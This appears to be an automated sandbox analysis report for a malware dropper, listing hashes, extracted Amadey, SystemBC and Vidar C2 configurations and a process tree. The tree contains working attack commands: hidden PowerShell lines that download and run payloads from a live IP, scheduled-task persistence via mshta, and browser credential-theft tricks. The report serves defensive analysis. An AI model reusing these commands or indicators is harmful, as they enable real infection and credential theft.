Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 05:37

General

  • Target

    c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe

  • Size

    2.0MB

  • MD5

    2341120afd619b888c8316c0a91d39b8

  • SHA1

    a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7

  • SHA256

    c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b

  • SHA512

    89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b

  • SSDEEP

    49152:LAHg7O11+U6WgTQv6Rw/HUtUXYeimDSD4ro:sHYO14UuQv6KHzj7E

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 4 IoCs
  • Detect Xworm Payload 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 26 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 38 IoCs
  • Uses browser remote debugging 2 TTPs 18 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 52 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 54 IoCs
  • Identifies Wine through registry keys 2 TTPs 26 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 32 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 28 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 16 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
    "C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe
        "C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4796
      • C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2460
      • C:\Users\Admin\AppData\Local\Temp\1086705101\d67718582a.exe
        "C:\Users\Admin\AppData\Local\Temp\1086705101\d67718582a.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn Z8UgTmauSLw /tr "mshta C:\Users\Admin\AppData\Local\Temp\t3amAh6NC.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4364
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn Z8UgTmauSLw /tr "mshta C:\Users\Admin\AppData\Local\Temp\t3amAh6NC.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4780
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\t3amAh6NC.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2352
            • C:\Users\Admin\AppData\Local\Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE
              "C:\Users\Admin\AppData\Local\Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2132
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4520
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2204
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4476
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2040
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3900
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1824
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4056
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3088
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "8cxKPmaAy8u" /tr "mshta \"C:\Temp\koWg8wZ64.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1752
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\koWg8wZ64.hta"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            PID:760
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4972
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:4336
      • C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          PID:920
          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
            5⤵
            • Executes dropped EXE
            PID:2332
            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:464
          • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2856
            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3456
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 828
              6⤵
              • Program crash
              PID:3588
          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1244
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              PID:544
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3228
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 972
              6⤵
              • Program crash
              PID:408
          • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
            "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
            5⤵
            • Executes dropped EXE
            PID:4724
          • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
            "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1480
            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:2860
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 964
              6⤵
              • Program crash
              PID:4412
          • C:\Users\Admin\AppData\Local\Temp\10008060101\eb522d694c.exe
            "C:\Users\Admin\AppData\Local\Temp\10008060101\eb522d694c.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2040
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2208
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2680
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3784
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4192
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2460
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              6⤵
                PID:4412
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:4080
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {19f1456a-c973-4655-bc78-a3530e3d736b} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" gpu
                    8⤵
                      PID:2652
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f4433fc-46cb-4b28-a904-5299e748482b} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" socket
                      8⤵
                        PID:2676
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3120 -prefMapHandle 3232 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c1c517b-d109-45bd-9223-d3f97828553e} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab
                        8⤵
                          PID:3220
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3972 -childID 2 -isForBrowser -prefsHandle 3968 -prefMapHandle 3964 -prefsLen 32822 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e805e1b5-f73b-4f70-a90d-e0669db75580} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab
                          8⤵
                            PID:4904
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4748 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4800 -prefMapHandle 4736 -prefsLen 32822 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8793857-5108-42c8-b9e2-93f3f0681fc8} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" utility
                            8⤵
                            • Checks processor information in registry
                            PID:3484
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 3 -isForBrowser -prefsHandle 5448 -prefMapHandle 5276 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8391e446-b118-4365-97de-86de5b8b97ae} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab
                            8⤵
                              PID:5340
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {958faacf-1eeb-49d5-9de5-aaf41503ece9} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab
                              8⤵
                                PID:5352
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5756 -childID 5 -isForBrowser -prefsHandle 5764 -prefMapHandle 5768 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44be0b17-f4ed-42ae-afeb-15ef7a8a59dd} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" tab
                                8⤵
                                  PID:5368
                          • C:\Users\Admin\AppData\Local\Temp\10008070101\c7ef445ed3.exe
                            "C:\Users\Admin\AppData\Local\Temp\10008070101\c7ef445ed3.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            PID:4748
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              6⤵
                              • Downloads MZ/PE file
                              • System Location Discovery: System Language Discovery
                              PID:6276
                      • C:\Users\Admin\AppData\Local\Temp\1086776001\6d5890a57c.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086776001\6d5890a57c.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2400
                      • C:\Users\Admin\AppData\Local\Temp\1086777001\1da84c3340.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086777001\1da84c3340.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Writes to the Master Boot Record (MBR)
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3608
                      • C:\Users\Admin\AppData\Local\Temp\1086778001\c5859bfd97.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086778001\c5859bfd97.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2192
                      • C:\Users\Admin\AppData\Local\Temp\1086779001\88e0f792cc.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086779001\88e0f792cc.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:3724
                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:5260
                      • C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:2964
                        • C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe
                          "C:\Users\Admin\AppData\Local\Temp\1086780001\Ta3ZyUR.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2748
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 964
                          4⤵
                          • Program crash
                          PID:2192
                      • C:\Users\Admin\AppData\Local\Temp\1086781001\d2YQIJa.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086781001\d2YQIJa.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4084
                      • C:\Users\Admin\AppData\Local\Temp\1086782001\3omTNLZ.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086782001\3omTNLZ.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4380
                      • C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe
                        "C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:2952
                        • C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe
                          "C:\Users\Admin\AppData\Local\Temp\1086783001\7aencsM.exe"
                          4⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Checks processor information in registry
                          PID:3088
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            5⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:5600
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
